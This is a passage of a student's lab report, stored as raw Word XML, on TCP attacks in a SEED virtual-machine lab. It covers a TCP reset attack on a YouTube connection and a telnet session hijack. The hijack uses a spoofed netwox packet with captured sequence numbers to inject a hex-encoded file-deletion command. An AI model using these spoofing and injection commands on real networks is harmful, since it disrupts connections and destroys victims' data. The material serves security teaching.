    <w:p w14:paraId="4908AA53" w14:textId="77777777" w:rsidR="00C05D90" w:rsidRPr="000D41D8" w:rsidRDefault="00C05D90" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731C2B82" w14:textId="34D38FA2" w:rsidR="004A3333" w:rsidRDefault="00070EBC" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Initially the client connected to YouTube and</w:t>
      </w:r>
      <w:r w:rsidR="001A4F97">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> started playing the video. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA253EA" w14:textId="77777777" w:rsidR="001A4F97" w:rsidRDefault="001A4F97" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0193CB21" w14:textId="17FEF1B3" w:rsidR="001A4F97" w:rsidRDefault="00CF5196" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C07C139" wp14:editId="2EEB67EE">
            <wp:extent cx="5930900" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-06%20at%2012.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s/Screen%20Shot%202018-03-06%20at%2012.29.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DE470FB" w14:textId="77777777" w:rsidR="001A4F97" w:rsidRDefault="001A4F97" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCF054E" w14:textId="5146FAE9" w:rsidR="001A4F97" w:rsidRDefault="00CF5196" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1BD6BA" wp14:editId="5BA12CF8">
            <wp:extent cx="5930900" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="22" name="Picture 22" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-06%20at%2012.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s/Screen%20Shot%202018-03-06%20at%2012.33.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3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B688D" w14:textId="77777777" w:rsidR="001A4F97" w:rsidRDefault="001A4F97" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B6B7E5" w14:textId="470657F9" w:rsidR="001A4F97" w:rsidRDefault="00E80822" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The command used is sudo netwox 78 –device “enp0s3” –I 10.0.2.7. We can see a lot of red packets which are sent by the attacker to the client as TCP RST packets.</w:t>
      </w:r>
      <w:r w:rsidR="00412A69">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client will then automatically send the reset packets to YouTube and the both way connection is terminated. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B2A82" w14:textId="77777777" w:rsidR="00CF5196" w:rsidRDefault="00CF5196" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EA85D5" w14:textId="215D7AA2" w:rsidR="00CF5196" w:rsidRDefault="00CF5196" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F8935E" wp14:editId="387CA89E">
            <wp:extent cx="5930900" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-06%20at%2012.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s/Screen%20Shot%202018-03-06%20at%2012.30.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EEA2F58" w14:textId="48083EB4" w:rsidR="00C05D90" w:rsidRPr="000D41D8" w:rsidRDefault="00C05D90" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 4</w:t>
      </w:r>
      <w:r w:rsidR="00E84768">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000D41D8" w:rsidRPr="000D41D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FA624" w14:textId="77777777" w:rsidR="004A3333" w:rsidRDefault="004A3333" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6AA91D" w14:textId="0659EA21" w:rsidR="004E4EA6" w:rsidRDefault="006C0A82" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The aim of this task4 is to perform TCP session hijacking. We will establish a telnet </w:t>
      </w:r>
      <w:r w:rsidR="00DE5610">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">connection between two victims. The telnet session generates a packet for each character typed from the keyword on the client, the server will echo back the character and is visible on the client. </w:t>
      </w:r>
      <w:r w:rsidR="00317F48">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to make the telnet server run a malicious command from the attacker. </w:t>
      </w:r>
      <w:r w:rsidR="009B5485">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We will use Wireshark from the attacker to observer the Sequence numbers and use the netwox command to hijack using the next sequence number accordingly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D30D3C" w14:textId="77777777" w:rsidR="00216321" w:rsidRDefault="00216321" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AF7BCE" w14:textId="2EDC6A01" w:rsidR="00216321" w:rsidRDefault="00216321" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">First a telnet session is established from VM1(10.0.2.6) to VM2(10.0.2.5). We will use </w:t>
      </w:r>
      <w:r w:rsidR="005B6A67">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> from attacker and observe a lot of telnet packets between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB6B20" w14:textId="77777777" w:rsidR="005B6A67" w:rsidRDefault="005B6A67" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC799DA" w14:textId="7304A61C" w:rsidR="003A43EB" w:rsidRDefault="003A43EB" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E4B2BA" wp14:editId="71AF7411">
            <wp:extent cx="5930900" cy="1993900"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="43" name="Picture 43" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-04%20at%208.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s/Screen%20Shot%202018-03-04%20at%208.04.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0" cy="1993900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A6506" w14:textId="77777777" w:rsidR="004C334A" w:rsidRDefault="004C334A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14657CC8" w14:textId="5E4E99BD" w:rsidR="003A43EB" w:rsidRDefault="003A43EB" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="086CCD1E" wp14:editId="6AFC8237">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rtualBox_SEED-UBUNTU2_04_03_2018_20_04_3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35D11188" w14:textId="77777777" w:rsidR="004C334A" w:rsidRDefault="004C334A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206D1266" w14:textId="77777777" w:rsidR="004A2C7B" w:rsidRDefault="004A2C7B" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48627656" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The last telnet packet from client to server has the following details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56881EEE" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F176521" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SRC IP = 10.0.2.6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F8690" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DST IP=10.0.2.5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A51E0" w14:textId="00F2ECE7" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SRC PORT = 56436 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293D91D" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DST PORT = 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD0619" w14:textId="15A6E0DE" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SEQ NUM = 3055680939</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFE1BF" w14:textId="424AF2DD" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="002333AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ACK = 297181304</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D9A381" w14:textId="77777777" w:rsidR="002333AC" w:rsidRDefault="002333AC" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF18FE8" w14:textId="66AD613A" w:rsidR="00AF7183" w:rsidRDefault="00AF7183" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We will use this information to construct a malicious packet to inject malicious command. Here we will try to remove a file imp.txt present </w:t>
      </w:r>
      <w:r w:rsidR="00F76AE3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>at /home/seed/De</w:t>
      </w:r>
      <w:r w:rsidR="0064139A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sktop/imp.txt. So the </w:t>
      </w:r>
      <w:r w:rsidR="008E620E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>command “</w:t>
      </w:r>
      <w:r w:rsidR="00F76AE3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /home/seed/Desktop/imp.txt” </w:t>
      </w:r>
      <w:r w:rsidR="0064139A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00F6485A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>given by the attacker and executed on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305AFD2F" w14:textId="77777777" w:rsidR="00C438AD" w:rsidRDefault="00C438AD" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAFCFCA" w14:textId="72633485" w:rsidR="00C438AD" w:rsidRDefault="008E620E" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The ls command for</w:t>
      </w:r>
      <w:r w:rsidR="00C438AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the last two times show the difference. Previously imp.txt was present, and the next time file was deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E95C28" w14:textId="24D02775" w:rsidR="00AC33F3" w:rsidRDefault="00C438AD" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71071C2A" wp14:editId="5896E84F">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rtualBox_SEED-UBUNTU Clone_04_03_2018_23_12_3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86858C" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BE4818" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E07A56" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC2293C" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B49D2A" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FE4135" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1845EC" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103F6D5E" w14:textId="77777777" w:rsidR="0064139A" w:rsidRDefault="0064139A" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B8E688" w14:textId="77777777" w:rsidR="00862D8B" w:rsidRDefault="00862D8B" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0070EC3E" w14:textId="77777777" w:rsidR="00862D8B" w:rsidRDefault="00862D8B" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152E9A45" w14:textId="5783CD87" w:rsidR="00A83560" w:rsidRDefault="00A83560" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The below command was executed from the attacker machine with the output </w:t>
      </w:r>
      <w:r w:rsidR="003C5E29">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>showing the malicious packet sent by the attacker in user readable format on the console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D62D149" w14:textId="77777777" w:rsidR="00235316" w:rsidRDefault="00A83560" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“sudo netwox 40 --ipv4-src</w:t>
      </w:r>
      <w:r w:rsidR="00590187">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “10.0.2.6” --ipv4-dst</w:t>
      </w:r>
      <w:r w:rsidR="009D3F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “10.0.2.5” --ipv4-ttl</w:t>
      </w:r>
      <w:r w:rsidR="00456969">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64 --tcp-dst</w:t>
      </w:r>
      <w:r w:rsidR="00BD3236">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “23” --tcp-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E9623" w14:textId="77777777" w:rsidR="00635B74" w:rsidRDefault="00235316" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">“56436” </w:t>
      </w:r>
      <w:r w:rsidR="005C7C43">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--tcp-seqnum</w:t>
      </w:r>
      <w:r w:rsidR="00A30366">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3055680939 --tcp-window</w:t>
      </w:r>
      <w:r w:rsidR="008257A2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2000 --tcp-acknum</w:t>
      </w:r>
      <w:r w:rsidR="00226E1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “297181304” </w:t>
      </w:r>
      <w:r w:rsidR="000D15D0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00226E1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidR="000D15D0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-urg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E1066F" w14:textId="4329E42A" w:rsidR="00A83560" w:rsidRDefault="00635B74" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--tcp-ack</w:t>
      </w:r>
      <w:r w:rsidR="00C42B82">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F81A8B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C42B82">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:r w:rsidR="00815443">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F1BC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--tcp-data</w:t>
      </w:r>
      <w:r w:rsidR="00007408">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00007408" w:rsidRPr="00007408">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>726d202f686f6d652f736565642f4465736b746f702f696d702e747874</w:t>
      </w:r>
      <w:r w:rsidR="00007408">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0D0D2022”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B71D9" w14:textId="77777777" w:rsidR="00A83560" w:rsidRDefault="00A83560" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BB7AE2" w14:textId="0AA40ABB" w:rsidR="00A83560" w:rsidRDefault="00A83560" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523C4F1F" wp14:editId="3F6CAB79">
            <wp:extent cx="5943600"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rtualBox_SEED-UBUNTU2_04_03_2018_23_13_2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CB8673" w14:textId="77777777" w:rsidR="00007408" w:rsidRDefault="00007408" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397629E9" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0532B28E" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F89C13" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50883801" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
